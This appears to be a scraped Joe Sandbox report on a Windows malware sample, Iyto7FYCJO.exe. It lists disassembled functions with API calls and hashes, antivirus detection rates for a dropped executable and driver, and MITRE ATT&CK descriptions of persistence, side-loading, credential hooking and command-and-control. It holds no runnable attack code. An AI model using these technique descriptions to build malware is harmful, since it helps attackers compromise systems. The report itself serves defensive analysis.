_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF750
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF757

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID:
API String ID: 15630516-0
Opcode ID: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
Instruction ID: 6b4a660d66ae36a4d52d8d6d9d7b2cadef71275fbe56cb2c4a506252cfee7e02
Opcode Fuzzy Hash: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
Instruction Fuzzy Hash: 6E91A063F65A818AEB40EFA4D4403ACB371EB547A8F814335DE2C26699DF3994A1C360

Function 00007FF7738EF9D0 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFB34

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFB21
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFBCE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EFBDB

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
Instruction ID: ad3df79d2816cd2fc0415ff3f65fd72d68c171851ab2ad36df6878c336a72a67
Opcode Fuzzy Hash: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
Instruction Fuzzy Hash: C651C1B3735B8A82DE44EB1594541A9E3A0F798BC4FC48636DE4D1B785DF3DE1A18320

Function 00007FF7738E9520 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
Instruction ID: a0429e277db34103fe18b001f07b83fceeb3ef0ff63fae04688c2a34db8ad4f3
Opcode Fuzzy Hash: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
Instruction Fuzzy Hash: 66518233628B8285DB509F28E45036DF3A0FB94B94F904236DA9D937A8EF7DC454C720

Function 00007FF7738F36F0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,00007FF7738F36C9), ref: 00007FF7738F37D3
memmove.VCRUNTIME140(?,?,?,00007FF7738F36C9), ref: 00007FF7738F37E6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7738F36C9), ref: 00007FF7738F384C

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F3859

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 36798d03f89bd7df17e9e62c4e2c1e0c6d0dca22d1dede475b6040d7aff5e051
Instruction ID: 98f5ff4011a7baed51e6bae7af3ed4fd9fe0bb18853097cdaf08da2de82ae8e7
Opcode Fuzzy Hash: 36798d03f89bd7df17e9e62c4e2c1e0c6d0dca22d1dede475b6040d7aff5e051
Instruction Fuzzy Hash: F441E463739A8785ED54AB26E444279E360AB24BD0F944631DA6D137D1DE7EE0A0C320

Function 00007FF7738EC8B0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC8F3
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC9B9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EC9DD

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: 78ecd34588d1295b6496e20391519401930434734a3d00d4ba2c8d3a2a4eb0b5
Instruction ID: 76dd62bf4d0cdeb5e71d18ac8fbdde51a6b7e0da4ef744350adb64556edcada2
Opcode Fuzzy Hash: 78ecd34588d1295b6496e20391519401930434734a3d00d4ba2c8d3a2a4eb0b5
Instruction Fuzzy Hash: B531B723B7974245E954BB12A440278D664AF057F4F980730DEBD277D6DE3DE1A18330

Function 00007FF7738F2620 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F26FB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F272F
memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F2739
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F2762

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 3b99ef85cf43863889d757c9bcf8c4a6a8c7478b69587d46b2c06943d5f6ef65
Instruction ID: deef004c814f826e8a3fc78135ae115e7cd4ec3fdf437b499a3896ebecc2b3df
Opcode Fuzzy Hash: 3b99ef85cf43863889d757c9bcf8c4a6a8c7478b69587d46b2c06943d5f6ef65
Instruction Fuzzy Hash: 1031C367B3974781EE50BB12E5002ADE2A1EB24BD0F980631DA6D1B7D5DE7DE0A18330

Function 00007FF7738ECC00 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7738ECCE0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ECD1D
memmove.VCRUNTIME140 ref: 00007FF7738ECD27
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ECD5A

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 23121f645e64b1a1485694149be1f852b99531ba4ef07daa1f06db3066981d20
Instruction ID: 0568d451833ef77a34d1ace36144e5d36e5406b53a6123d06d25aa8400551eb1
Opcode Fuzzy Hash: 23121f645e64b1a1485694149be1f852b99531ba4ef07daa1f06db3066981d20
Instruction Fuzzy Hash: D6310763B3978290EE50AB12A5003ADE661AB04BD0F984735DEAD177C5DF7EE060C330

Function 00007FF7738ED270 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED342

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

memmove.VCRUNTIME140 ref: 00007FF7738ED373
memmove.VCRUNTIME140 ref: 00007FF7738ED383
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED3A6

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
Instruction ID: 61e5b86507ad9251ebd2b5cbc39372ecec5f230225200fe58b81c55f4f0c58e1
Opcode Fuzzy Hash: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
Instruction Fuzzy Hash: 0A31C52372964194EA64EB12A4402B9E251AB887B4F9C0731DE7D577D5EF3DE0A9C320

Function 00007FF7738EC9F0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7738ECA28
memmove.VCRUNTIME140 ref: 00007FF7738ECAC9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ECAE7

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: 43086135f500e49417e2b2305c429d523123fbe14cf59deed155151307bdd8b0
Instruction ID: 41642f34b3ddc1a1645a040cbc257e698309c65c35ed582c69c1e59d0c00d596
Opcode Fuzzy Hash: 43086135f500e49417e2b2305c429d523123fbe14cf59deed155151307bdd8b0
Instruction Fuzzy Hash: AC21F9A3E7975644E955FB11A50037CD2549B04BE4FA80731DEAD277C2DE7DA4A28330

Function 00007FF7738F3A94 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7738F3ADD
GetLastError.KERNEL32 ref: 00007FF7738F3AEB
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7738F24A5), ref: 00007FF7738F3B20
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7738F24A5), ref: 00007FF7738F3B2E

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
Instruction ID: 99ce6f797929aa94db959e7eb5af21d8c1755e2e90c9fcaa15b4af97cd456b84
Opcode Fuzzy Hash: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
Instruction Fuzzy Hash: 77213A73A28B8287E3609F11E40431EFAA4F798B94F640234DB8967B54DF7ED8558B20

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	ReversingLabs: Detection: 55%
Source: C:\Windows\Vulnerability.exe	ReversingLabs: Detection: 55%
Source: C:\Windows\driver.sys	ReversingLabs: Detection: 62%

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe	Joe Sandbox ML: detected

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Iyto7FYCJO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

C:\Windows\Vulnerability.exe

C:\Windows\driver.sys

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
Iyto7FYCJO.exe

Function 00007FF7738E45E0 Relevance: 110.9, APIs: 36, Strings: 27, Instructions: 601
libraryfilethreadCOMMON

Function 00007FF7738E3CE0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 122
fileCOMMON

Function 00007FF7738F14C0 Relevance: 9.0, APIs: 6, Instructions: 50
processCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre